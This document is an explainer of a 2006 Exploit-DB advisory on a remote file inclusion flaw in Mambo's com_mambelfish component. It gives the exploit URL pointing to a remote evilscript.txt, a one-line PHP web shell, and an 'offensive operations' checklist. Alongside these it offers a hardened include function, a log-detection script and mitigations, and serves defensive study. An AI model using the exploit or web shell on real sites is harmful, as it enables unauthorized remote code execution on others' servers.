Understanding the Mambo mambelfish RFI Vulnerability (2006)
What this paper is
This paper describes a Remote File Inclusion (RFI) vulnerability found in the com_mambelfish component of Mambo, a popular Content Management System (CMS) at the time. The vulnerability allows an attacker to trick the web application into including and executing arbitrary files from a remote server.
Simple technical breakdown
The core of the vulnerability lies in how Mambo's com_mambelfish component handles configuration paths. Specifically, it uses a variable named $mosConfig_absolute_path to build the full path to other required files. If an attacker can control the value of $mosConfig_absolute_path and point it to a remote URL, the application might be tricked into fetching and executing code from that remote URL instead of a local file. This is a classic Remote File Inclusion (RFI) vulnerability.
Complete code and payload walkthrough
The paper highlights a specific line of code and an exploit example.
Vulnerable Code Snippet:
require_once( "$mosConfig_absolute_path/administrator/classes/minixml/minixml.inc.php" );
Explanation:
- require_once(): a PHP construct that includes and evaluates the specified file. If the file has already been included, require_once() will not include it again.
- "$mosConfig_absolute_path/administrator/classes/minixml/minixml.inc.php": the path to a file that the application needs to function. The critical part here is $mosConfig_absolute_path.
The Vulnerability:
The vulnerability exists because the value of $mosConfig_absolute_path is not properly sanitized or validated before being used in the require_once() statement. If an attacker can inject a URL into $mosConfig_absolute_path, PHP's require_once() function, when dealing with URLs (especially when allow_url_include is enabled in php.ini), can fetch and execute the content of that remote URL.
Exploit Example:
http://www.site.com/[path]/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://site.com/evilscript.txt?
Explanation of the Exploit:
- http://www.site.com/: the target website.
- [path]/administrator/components/com_mambelfish/mambelfish.class.php: the script that contains the vulnerable require_once() call. The attacker targets this file directly.
- ?mosConfig_absolute_path=: how the attacker injects a value into the $mosConfig_absolute_path variable via a GET request.
- http://site.com/evilscript.txt: the attacker-controlled remote server and a file containing malicious PHP code.
- ?: the trailing question mark is often used to terminate the query string for the target script, ensuring that the mosConfig_absolute_path parameter is correctly interpreted by the remote script if it also expects query parameters.
Mapping:
- require_once( "$mosConfig_absolute_path/..." ) -> Practical Purpose: to load necessary library files for the mambelfish component.
- mosConfig_absolute_path variable -> Practical Purpose: intended to hold the absolute path to the Mambo installation's root directory on the server.
- http://site.com/evilscript.txt -> Practical Purpose: the attacker's remote server hosting malicious PHP code. When included by the vulnerable server, this code will be executed.
Payload (Conceptual):
The evilscript.txt would contain PHP code. A common payload for RFI would be something like:
<?php
system($_GET['cmd']);
?>
When the vulnerable server includes http://site.com/evilscript.txt?cmd=ls, the system() function would execute the ls command on the vulnerable server, and the output would be returned as part of the web response.
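The quoted include from line 28, with the request-controlled variable made explicit, beside a hardened replacement. This is an added example written for this page, not code from the original paper or from Mambo; the function names (vulnerable_include_target, resolve_local_include) and the directory layout assumed by dirname(__DIR__, 3) are my own assumptions.

```php
<?php
// Added example for this page (not code from the original paper or from Mambo).
// First the shape of the vulnerable include, with the request-controlled
// variable made explicit; then a hardened replacement. Function names and
// the directory layout assumed below are illustrative assumptions.

// --- Vulnerable shape (for contrast only) ------------------------------------
// Under register_globals=On (common in 2006), ?mosConfig_absolute_path=...
// becomes a global before the script runs; this function makes that explicit.
function vulnerable_include_target(array $request): string
{
    $mosConfig_absolute_path = $request['mosConfig_absolute_path'] ?? '';
    // A remote URL supplied here is passed straight to require_once().
    return "$mosConfig_absolute_path/administrator/classes/minixml/minixml.inc.php";
}

// --- Hardened form -----------------------------------------------------------
// 1. The install root is anchored to the file's own location (__DIR__), so no
//    request parameter can redefine it.
// 2. The relative path is rejected if it carries any scheme or stream wrapper
//    (http://, ftp://, php://, data:, phar://) and, after realpath(), must
//    still sit inside the install root.
function resolve_local_include(string $installRoot, string $relative): ?string
{
    // Any "scheme:" prefix is refused before the filesystem is consulted.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative) === 1) {
        return null;
    }
    $root = realpath($installRoot);
    if ($root === false) {
        return null;
    }
    $candidate = realpath($root . DIRECTORY_SEPARATOR . ltrim($relative, '/\\'));
    if ($candidate === false) {
        return null; // target does not exist; nothing to include
    }
    // Containment check: the resolved path must start with "<root>/".
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null; // escaped the root through ../ or a symlink
    }
    return $candidate;
}

// Usage from administrator/components/com_mambelfish/ (assumed layout):
// three levels up is the site root, found without consulting the request.
$installRoot = dirname(__DIR__, 3);
$library = resolve_local_include($installRoot, 'administrator/classes/minixml/minixml.inc.php');
if ($library === null) {
    http_response_code(500);
    exit('required library not found');
}
require_once $library;
```

The scheme check runs before realpath() on purpose: realpath() cannot resolve a URL and would simply return false, but refusing "scheme:" prefixes explicitly documents the intent and also covers wrappers such as php://filter and data: that allow_url_include does not govern. Keeping allow_url_include and allow_url_fopen set to Off in php.ini remains the configuration-level control; the code-level check is what protects the application when that setting is not under the developer's control.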
Practical details for offensive operations teams
- Required Access Level: Unauthenticated. This is a web-based vulnerability exploitable via HTTP requests.
- Lab Preconditions:
  - A target web server running Mambo with the com_mambelfish component installed.
  - The allow_url_include directive must be enabled in the target server's php.ini configuration. This is a crucial prerequisite and was often disabled by default for security reasons, but might be enabled on misconfigured servers.
  - The target server must be able to make outbound HTTP requests to the attacker's controlled server.
  - An attacker-controlled web server capable of serving PHP files or plain text that will be interpreted as PHP.
- Tooling Assumptions:
  - A web browser for manual testing.
  - A web proxy (e.g., Burp Suite, OWASP ZAP) for intercepting and modifying requests.
  - A simple HTTP server (e.g., Python's http.server, netcat) or a dedicated web server (Apache, Nginx) to host the malicious payload.
  - A vulnerability scanner that can identify RFI vulnerabilities (though manual verification is always recommended).
- Execution Pitfalls:
  - allow_url_include disabled: the most common reason for failure. If this PHP setting is Off, the server will not execute remote files.
  - Firewall/Network Restrictions: the target server might be prevented from making outbound connections to the attacker's server.
  - Input Validation/WAF: a Web Application Firewall (WAF) or overly strict input validation on the target application might block the malicious URL.
  - Incorrect Path: the [path] in the exploit URL might be wrong, or the com_mambelfish component might not be installed at the expected location.
  - Payload Interpretation: the remote file might be served with the wrong Content-Type header, preventing PHP execution.
  - Trailing Characters: the exact syntax of the exploit URL, especially the trailing ?, can sometimes matter depending on how the target script handles query parameters.
- Expected Telemetry:
  - Outbound HTTP Request: the target server will attempt to connect to the attacker's server to fetch evilscript.txt. This will appear in network logs.
  - Web Server Logs: the target web server will log the request for mambelfish.class.php with the injected mosConfig_absolute_path parameter.
  - PHP Error Logs: if allow_url_include is off or the remote file cannot be fetched, PHP error logs on the target server might record warnings or errors related to file inclusion.
  - Payload Execution Logs: if the payload executes commands (e.g., using system()), these command executions might be logged by the operating system or application logs on the target server.
  - Access Logs on Attacker Server: the attacker's server will log the incoming HTTP request for evilscript.txt.
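The "Web Server Logs" telemetry item above is the one a defender can act on directly. As an added example (not from the original paper), the script below triages Apache combined-format access log lines for the RFI pattern this page describes: any query parameter whose decoded value begins with a URL scheme or PHP stream wrapper, and any request that supplies mosConfig_absolute_path at all, since that variable is only ever meant to be set by the installation's configuration. The log lines, client addresses and the function name find_rfi_attempts are constructed for this example.

```php
<?php
// Added example (not from the original paper): log triage for the RFI pattern
// described on this page. The access log lines below are constructed sample
// data in Apache combined format; the addresses are documentation ranges.
$sampleLog = <<<'LOG'
203.0.113.5 - - [17/Aug/2006:10:12:01 +0000] "GET /index.php?option=com_mambelfish HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [17/Aug/2006:10:12:07 +0000] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://198.51.100.7/evilscript.txt? HTTP/1.1" 200 231 "-" "Mozilla/5.0"
203.0.113.9 - - [17/Aug/2006:10:12:09 +0000] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=https%3A%2F%2F198.51.100.7%2Fevilscript.txt%3F HTTP/1.1" 200 231 "-" "Mozilla/5.0"
203.0.113.12 - - [17/Aug/2006:10:13:40 +0000] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=/var/www/mambo HTTP/1.1" 200 231 "-" "Mozilla/5.0"
LOG;

/**
 * Returns one finding per suspicious request parameter. A parameter is
 * suspicious when its percent-decoded value starts with a URL scheme or a PHP
 * stream wrapper, or when it is mosConfig_absolute_path, which a legitimate
 * client has no reason to send.
 */
function find_rfi_attempts(string $log): array
{
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $index => $line) {
        // client, timestamp and request target from the combined log format
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+) [^"]*"/', $line, $m)) {
            continue; // not a request line we understand
        }
        $client = $m[1];
        $when   = $m[2];
        $target = $m[3];
        $query  = parse_url($target, PHP_URL_QUERY);
        if ($query === null || $query === false) {
            continue; // no query string, nothing to inject into
        }
        parse_str($query, $params); // parse_str also percent-decodes values
        foreach ($params as $name => $value) {
            if (!is_string($value)) {
                continue; // array-valued parameters (a[]=...) are out of scope here
            }
            $remote = preg_match('#^(?:https?|ftps?|php|data|expect|phar):#i', $value) === 1;
            $configOverride = strcasecmp((string) $name, 'mosConfig_absolute_path') === 0;
            if ($remote || $configOverride) {
                $findings[] = [
                    'line'      => $index + 1,
                    'client'    => $client,
                    'time'      => $when,
                    'path'      => parse_url($target, PHP_URL_PATH),
                    'parameter' => $name,
                    'value'     => $value,
                    'reason'    => $remote ? 'remote URL or stream wrapper in parameter'
                                           : 'configuration variable supplied via request',
                ];
            }
        }
    }
    return $findings;
}

foreach (find_rfi_attempts($sampleLog) as $f) {
    printf("line %d: %s -> %s?%s=%s (%s)\n",
        $f['line'], $f['client'], $f['path'], $f['parameter'], $f['value'], $f['reason']);
}
```

Decoding before matching matters: the third sample line carries the same URL with the scheme percent-encoded, which a naive substring search for "http://" in the raw log would miss. The fourth line shows the second rule at work, flagging a local path supplied through the request even though it contains no URL, because the parameter name alone is already a sign that someone is probing for register_globals-style variable injection.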
Where this was used and when
- Context: This vulnerability was prevalent in the mid-2000s within PHP web applications, particularly Content Management Systems (CMS) like Mambo and its successor, Joomla!. RFI was a common attack vector against such platforms.
- Approximate Years: The paper was published in August 2006. Vulnerabilities of this nature were actively discovered and exploited in the years leading up to and following this date, roughly 2005-2008.
Defensive lessons for modern teams
- Input Validation is Paramount: Never trust user-supplied input, especially when it's used in file paths, database queries, or system commands. Always sanitize and validate input rigorously.
- Secure PHP Configuration:
  - Keep allow_url_include and allow_url_fopen set to Off in php.ini unless absolutely necessary for specific, controlled use cases.
  - Regularly review and harden php.ini settings.
- Principle of Least Privilege: Ensure web applications run with the minimum necessary permissions.
- Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns like RFI. Keep WAF rules updated.
- Regular Patching and Updates: Keep all CMS, plugins, themes, and underlying software (PHP, web server) up-to-date with the latest security patches. This vulnerability was specific to an older version of Mambo.
- Dependency Management: Be aware of the libraries and components used by your applications. Vulnerabilities can exist in third-party code.
- Network Segmentation and Egress Filtering: Restrict outbound network connections from web servers to only necessary destinations. This can prevent a successful RFI from reaching out to an attacker's server.
ASCII visual (if applicable)
+-----------------+        +--------------------------+        +-----------------+
| Attacker Server | -----> | Target Web Server (Mambo)| -----> | Target Database |
| (Hosts evil.txt)|        | (Vulnerable Component)   |        +-----------------+
+-----------------+        +------------+-------------+
                                        |
                                        | (HTTP Request)
                                        | mosConfig_absolute_path=http://attacker.com/evil.txt
                                        |
                                        v
                           +-------------------------+
                           |    PHP Interpreter      |
                           | (Processes require_once)|
                           +-------------------------+
                                        |
                                        | (Includes remote file)
                                        |
                                        v
                           +-------------------------+
                           |  Attacker's evil.txt    |
                           | (Contains PHP payload)  |
                           | (Executed on Target)    |
                           +-------------------------+
Source references
- Paper ID: 2202
- Paper Title: Mambo Component mambelfish 1.1 - Remote File Inclusion
- Author: mdx
- Published: 2006-08-17
- Keywords: PHP, webapps
- Paper URL: https://www.exploit-db.com/papers/2202
- Raw URL: https://www.exploit-db.com/raw/2202
Original Exploit-DB Content (Verbatim)
####################################################
# #
# C Y BE R - W A R R i O R T I M #
# #
####################################################
mambo com_mambelfish Component (mosConfig_absolute_path) Remote File
Inclusion Vulnerabilities
####################################################
Author: mdx
####################################################
Class : Remote
####################################################
cont@ct: bilkopat[at]hotmail[dot]com
####################################################
Code: mambelfish.class.php?, line 28
***************************************************************************************************
require_once( "$mosConfig_absolute_path/administrator/classes/minixml/minixml.inc.php" );
***************************************************************************************************
Exploit:
http://www.site.com/[path]/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://site.com/evilscript.txt?
####################################################
Greetz: Cyber-warrior TIM USERS
####################################################
# milw0rm.com [2006-08-17]